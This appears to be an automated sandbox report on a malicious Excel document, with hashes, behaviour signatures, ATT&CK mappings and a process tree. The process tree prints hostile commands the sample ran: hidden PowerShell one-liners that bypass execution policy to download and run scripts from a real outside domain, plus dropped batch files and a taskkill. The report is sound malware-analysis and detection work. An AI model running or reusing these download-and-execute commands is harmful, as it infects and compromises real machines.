Analysis

  • max time kernel
    150s
  • max time network
    46s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
  • submitted
    16-08-2022 07:46

General

  • Target

    SecuriteInfo.com.Exploit.Siggen3.17232.13262.xls

  • Size

    33KB

  • MD5

    7a115715d7ff051cdc0a008521e2c35e

  • SHA1

    34e5ceddef13f16f6f5ee775c198b5cf76552b55

  • SHA256

    d5d8cca33368d72e3d58ea71e3b4984f336d93b21af1c896141635961a0d777d

  • SHA512

    821f80a21bef4999bfd9f1aa846d1b5649dbb96d4e0acf3004966eb7ba9f418412db0450dcc11c72cca4c8ce1d9c2b9ac0b33ce8083f3e814bc9c74d15ec670e

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Runs ping.exe 1 TTPs 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 56 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Exploit.Siggen3.17232.13262.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:868
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 80 127.0.0.1 & %public%\Outlook.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:964
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 80 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1812
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:892
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/log.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1704
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 85 127.0.0.1 & %public%\task.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1828
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 85 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1652
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 10 127.0.0.1 & %public%\DefenderFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2016
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 10 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1068
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:692
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          PowerShell -ex Bypass -nOp -w 1 i'e'x(iwr('http://facextrade.com.br/df.txt'))
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:836
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c start /min taskkill /f /im WINWORD.EXE
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:452
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /f /im WINWORD.EXE
          4⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:564
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c ping -n 7 127.0.0.1 & %public%\KilFile.bat exit
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2012
      • C:\Windows\SysWOW64\PING.EXE
        ping -n 7 127.0.0.1
        3⤵
        • Runs ping.exe
        PID:1980

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Remote System Discovery

1
T1018

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    c47fac48a1c9495e02a2f5438766b807

    SHA1

    0ff1c5f5c0d01968827e770ededa6a9e71dc122b

    SHA256

    03d2d09c0bdb14242e15e61333574f6f78f92d887f350d713c2d6c9bad606bfd

    SHA512

    d8d443193a130c97d9b589ffd464fa77c1afb021e09c5cc45205469938b779b1f1625ed6453585176705981c9c68846c391990abafa5d5165fb7f5ce235e2a8c

  • C:\Users\Public\DefenderFile.bat
    Filesize

    1KB

    MD5

    ae4a0997ce01f4ebbb3f3cc0054ce933

    SHA1

    e5bfe3b390f1208b8b6ea0317f4364005f552851

    SHA256

    a33dd1505c2ac665e6e1fd424a048997ec0f43914b8f73037bd94dc2e89e35ce

    SHA512

    5de2f43af7756cd7be659d6f03314240e08ecfee7bcb97b45f828ef938a0a0a84b0c36667d0447fd5bfa4851e5eef9cf98182933bda86b42af4a154b37b2f184

  • C:\Users\Public\Outlook.bat
    Filesize

    900B

    MD5

    0427a3545c2eaed3167cffe2cf5f8aba

    SHA1

    b27f3a7d2b855f1d0b84727603add711bb6f6170

    SHA256

    ec7da386a5fc7007e33ffdcd8ab64b6ac207d1886e04b9b60f27a95533347391

    SHA512

    fafb712a5b636c0118128c2d448271680e66fc73fac67538f4b84c9917a7053470d7710ce508cfd82c941942e469bd3d048d7ebbcefa99797542ad026dfe038b

  • memory/452-72-0x0000000000000000-mapping.dmp
  • memory/564-73-0x0000000000000000-mapping.dmp
  • memory/692-70-0x0000000000000000-mapping.dmp
  • memory/836-77-0x000000006B370000-0x000000006B91B000-memory.dmp
    Filesize

    5.7MB

  • memory/836-76-0x000000006B370000-0x000000006B91B000-memory.dmp
    Filesize

    5.7MB

  • memory/836-71-0x0000000000000000-mapping.dmp
  • memory/868-78-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/868-79-0x0000000071E8D000-0x0000000071E98000-memory.dmp
    Filesize

    44KB

  • memory/868-55-0x0000000070EA1000-0x0000000070EA3000-memory.dmp
    Filesize

    8KB

  • memory/868-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/868-54-0x000000002F321000-0x000000002F324000-memory.dmp
    Filesize

    12KB

  • memory/868-57-0x0000000075131000-0x0000000075133000-memory.dmp
    Filesize

    8KB

  • memory/868-58-0x0000000071E8D000-0x0000000071E98000-memory.dmp
    Filesize

    44KB

  • memory/868-75-0x0000000071E8D000-0x0000000071E98000-memory.dmp
    Filesize

    44KB

  • memory/892-81-0x0000000000000000-mapping.dmp
  • memory/964-61-0x0000000000000000-mapping.dmp
  • memory/1068-67-0x0000000000000000-mapping.dmp
  • memory/1652-66-0x0000000000000000-mapping.dmp
  • memory/1704-82-0x0000000000000000-mapping.dmp
  • memory/1704-85-0x0000000073880000-0x0000000073E2B000-memory.dmp
    Filesize

    5.7MB

  • memory/1812-65-0x0000000000000000-mapping.dmp
  • memory/1828-62-0x0000000000000000-mapping.dmp
  • memory/1980-68-0x0000000000000000-mapping.dmp
  • memory/2012-64-0x0000000000000000-mapping.dmp
  • memory/2016-63-0x0000000000000000-mapping.dmp